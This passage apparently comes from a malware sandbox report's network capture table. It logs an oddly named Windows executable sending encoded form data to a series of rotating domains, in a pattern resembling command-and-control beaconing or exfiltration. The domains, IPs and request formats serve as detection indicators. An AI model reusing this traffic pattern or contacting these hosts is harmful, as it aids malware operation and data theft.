                                                              Data Ascii: Ux_TPFo=YxM2bnsTaCCVQfDVh0N2fVaqeQBEx9U0VTN3iZSaLkB0TfRweoO/+5LtcFQeofkEmGo29JZyoAxFbFy/0Gi+0n08Wr5o5LTjmoQGESpC5ybJnZr6G7dpjWdixSuY45YIY6se0gOoMXTmDCaMoT+srm5inRueJQhtRRtDyWDdujbI1+XvD2mQP3Nq0uqdCcmdSXAQsrBD/11tFokoln8QMLNuMSS5


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              31 | 192.168.2.8 | 49746 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:02.915519953 CEST | 1786 | OUT | POST /8q1d/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.longfilsalphonse.net
                                                              Origin: http://www.longfilsalphonse.net
                                                              Referer: http://www.longfilsalphonse.net/8q1d/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              32 | 192.168.2.8 | 49747 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:05.460616112 CEST | 480 | OUT | GET /8q1d/?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.longfilsalphonse.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:05.939368010 CEST | 414 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:18:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ=="}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              33 | 192.168.2.8 | 49748 | 38.47.232.144 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:11.424036026 CEST | 716 | OUT | POST /wqu9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.yu35n.top
                                                              Origin: http://www.yu35n.top
                                                              Referer: http://www.yu35n.top/wqu9/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=QBSjsgWvRN45k0ku1nplkvuKrNRJs38d6igZnv+XeVKO2Jpq/WOqKJtcnLl2CCxofoqEH7+yuPEHZOq0CbWgJpDV3MMQLSclsBK15WC2lU8rwb79BQnCJdBTZJXZreCeNKrPFfhBfBAypoLehr1MZavxv6+FvprashLjghil4YYgEceG1imjTEqEJ4jAV0W//TillQU=
                                                              Sep 25, 2024 09:18:12.305397034 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              34 | 192.168.2.8 | 49749 | 38.47.232.144 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:13.962995052 CEST | 736 | OUT | POST /wqu9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.yu35n.top
                                                              Origin: http://www.yu35n.top
                                                              Referer: http://www.yu35n.top/wqu9/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=QBSjsgWvRN451k0u6gFlzfuJntRJnX8Z6isZnqG5egSO1rxq8XOqJJtcvrl3NixZfom2H7CyuOgHZMi0CMKnP5DX8sMWPSclsBK15WHjlQYrxrr9A1LBD9BQJ5XZm+CaNKqaFeNnfD4ypsDeh+BNSavNjq/snJayuXmNiw2+4KdEFqzsvAulQECvJ7L2QDLXlwyV7HAFXj3KQfIYGGuOGAySp3PV
                                                              Sep 25, 2024 09:18:14.847249031 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              35 | 192.168.2.8 | 49750 | 38.47.232.144 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:16.511149883 CEST | 1753 | OUT | POST /wqu9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.yu35n.top
                                                              Origin: http://www.yu35n.top
                                                              Referer: http://www.yu35n.top/wqu9/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]
                                                              Sep 25, 2024 09:18:17.408889055 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:17 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              36 | 192.168.2.8 | 49751 | 38.47.232.144 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:19.052855968 CEST | 469 | OUT | GET /wqu9/?Ux_TPFo=dD6DvXSgWvkhkExz9ANGg62vkcZOvm8u+S0LjtafD2Cb45k+h0GLDfxxrLcTCDpid42VLL2gjPURfP6UcdvjDLDV680rGTEuq0qU4X+foBMe6t+yESiAaeFaZa7j0sbyXQ==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.yu35n.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:19.934047937 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:19 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              37 | 192.168.2.8 | 49752 | 52.230.28.86 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:24.990870953 CEST | 716 | OUT | POST /ujoo/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.52ywq.vip
                                                              Origin: http://www.52ywq.vip
                                                              Referer: http://www.52ywq.vip/ujoo/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=pEvSLmKb78E8SZGnyPtZkOgcCeptt66B2sTTyhzVNm+5mNgqPY6Wxz2VfGiTzL0Ay2/ayz4mtqgm05oegqMVCvB+sRQ6pMt46orODMxoAaybA/0dfvcawWyooqHB4Q4XSvWifQgaeI0GseW/B4jnz4EtznvPgYVYSz7MzcWewO73d3kKdmfWWHM0uJn+6otzsD/OACM=
                                                              Sep 25, 2024 09:18:26.069722891 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/
                                                              Server: CDNRay
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              38 | 192.168.2.8 | 49753 | 52.230.28.86 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:27.545758963 CEST | 736 | OUT | POST /ujoo/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.52ywq.vip
                                                              Origin: http://www.52ywq.vip
                                                              Referer: http://www.52ywq.vip/ujoo/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=pEvSLmKb78E8Ao2nwutZjugfO+ptka6N2tvTygmQN0a5mv4qOZ6Wyz2VL2is+r0Jy3DSyyUmtrEm08MegZUSBfBGnxQ4nst46orODM1RAaqbAvEdfN0ZzWyv/aHB8Q5eSvWMfUpSeMEGsfm/CsPg64EjuXuzhKJdaS2p7O6F79PPRhJgHEXQVHkfuKPI/fwb2gv+eVbeAKbNKc098e9LFxKnnQfo
                                                              Sep 25, 2024 09:18:28.619735956 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:28 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/
                                                              Server: CDNRay
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              39 | 192.168.2.8 | 49754 | 52.230.28.86 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:30.088362932 CEST | 1753 | OUT | POST /ujoo/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.52ywq.vip
                                                              Origin: http://www.52ywq.vip
                                                              Referer: http://www.52ywq.vip/ujoo/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo= [TRUNCATED]
                                                              Sep 25, 2024 09:18:31.152923107 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/
                                                              Server: CDNRay
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              40 | 192.168.2.8 | 49755 | 52.230.28.86 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:32.660769939 CEST | 469 | OUT | GET /ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC+k3iYjthOPfxR3hOlb9i/x9FbCM9gWjU2jH2bxpk27YwwYDjrUExqEoirVxd+JcnloOoNZ40tu8bNN8NKiaeO1oTtxon0OItavvmTQbTg==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.52ywq.vip
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:33.704677105 CEST | 519 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 25 Sep 2024 07:18:33 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 166
                                                              Connection: close
                                                              Location: https://6329.vhjhbv.com/ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC+k3iYjthOPfxR3hOlb9i/x9FbCM9gWjU2jH2bxpk27YwwYDjrUExqEoirVxd+JcnloOoNZ40tu8bNN8NKiaeO1oTtxon0OItavvmTQbTg==&FvypB=88kTDXb8k4dH
                                                              Server: CDNRay
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              41 | 192.168.2.8 | 49756 | 133.130.35.90 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:40.073472023 CEST | 722 | OUT | POST /ypa3/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.komart.shop
                                                              Origin: http://www.komart.shop
                                                              Referer: http://www.komart.shop/ypa3/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=JvH7lhn5YuwHR8D7ig2edf2zK2Udm66bZcW98rFJyZmD20zHNKLhmo0K4XV8Kid/zW1nVhXGqLS6fzti/SG74gYzYt7G8YW8UE+VrgLev8+83a1j+rbf679f7/roRjBrdMBk1ksyUXDFNJLZV0ORlzqCPK6iU6Nlwzt7WI65BGhVQDNGET/jF2atouDaCZX1k043/rg=
                                                              Sep 25, 2024 09:18:40.853210926 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                              content-encoding: gzip
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:40 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 454
                                                              connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              42 | 192.168.2.8 | 49757 | 133.130.35.90 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:42.621962070 CEST | 742 | OUT | POST /ypa3/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.komart.shop
                                                              Origin: http://www.komart.shop
                                                              Referer: http://www.komart.shop/ypa3/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=JvH7lhn5YuwHAsT7gB2eVf2wFWUdsa6hZca98qQUzryD2VjHOLLhlo0K33U2XSdKzW5vVjDGqLG6f2Ri4h+44wYxB97Ex4W8UE+VrgP4v8W80qFjsKbc579Q8/roATBvdMBG1lwcUV7FNI7ZVgSS8Dq+Q670eZ0a+ktgdayjDQ1XYVgsex3lG2yGotrsHuKd+XoHh82iUpvLY9MgAIKX4JORf+oM
                                                              Sep 25, 2024 09:18:43.409024000 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                              content-encoding: gzip
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:43 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 454
                                                              connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              43 | 192.168.2.8 | 49758 | 133.130.35.90 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:45.164534092 CEST | 1759 | OUT | POST /ypa3/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.komart.shop
                                                              Origin: http://www.komart.shop
                                                              Referer: http://www.komart.shop/ypa3/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:45.986351967 CEST | 668 | IN | HTTP/1.1 404 Not Found
                                                              content-encoding: gzip
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:45 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 454
                                                              connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              44 | 192.168.2.8 | 49759 | 133.130.35.90 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:47.816931963 CEST | 471 | OUT | GET /ypa3/?Ux_TPFo=EtvbmXebZ+kERMHYn1m9SdOeKiFdq52bRf+Bnrg8mYDc8XPjIo/GtaNN4S1/Ry5wyE5veib2sb/FYFZZwx3N4jsKRZfkwZ7IXAzk/wTFocSMyqJij72Vua102dz6GHAwJQ==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.komart.shop
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:48.608295918 CEST | 883 | IN | HTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:48 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 693
                                                              connection: close
                                                              Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              45 | 192.168.2.8 | 49760 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:53.895301104 CEST | 731 | OUT | POST /hvm1/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.timetime.store
                                                              Origin: http://www.timetime.store
                                                              Referer: http://www.timetime.store/hvm1/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=Nii7/1fTzID0/PbHHFGUkv19XVv874dDc57/v62jiIkirA3vqx1S+RSA2x4Fbd41Z+wXGhNUtS1Yb38k0L7j1YxOR1jWZfHHgchU94o6MUC7xwy2v5sklRoWxRSxUdYN4Np6bh6RlbOai/swCiC8LO/Gsflt3NRQMhwcjYRGvNA1hXEO02675yI4mjzZMcxFfzA8by8=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              46 | 192.168.2.8 | 49761 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:56.445892096 CEST | 751 | OUT | POST /hvm1/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.timetime.store
                                                              Origin: http://www.timetime.store
                                                              Referer: http://www.timetime.store/hvm1/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=Nii7/1fTzID0/qTHUUGUmP0PJFv8xYdHc53/v4az3sIiqlLvrzdS9RSAvB4MD948Z+s1GklUtShYbyYk34jizIxQKljUU/HHgchU94tdMUK7xDq2+tYj5BoJ5xSxQdYW4NotbhLGldSai+cwCzC/S+/Aj/l+5oIgDi0Eo6cggOMyghpkuUy96ygTmgbvJrstFQQMFlpgDSJcCy8/4VnyX8MmfXn+


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              47 | 192.168.2.8 | 49762 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:18:58.997534037 CEST | 1768 | OUT | POST /hvm1/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.timetime.store
                                                              Origin: http://www.timetime.store
                                                              Referer: http://www.timetime.store/hvm1/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
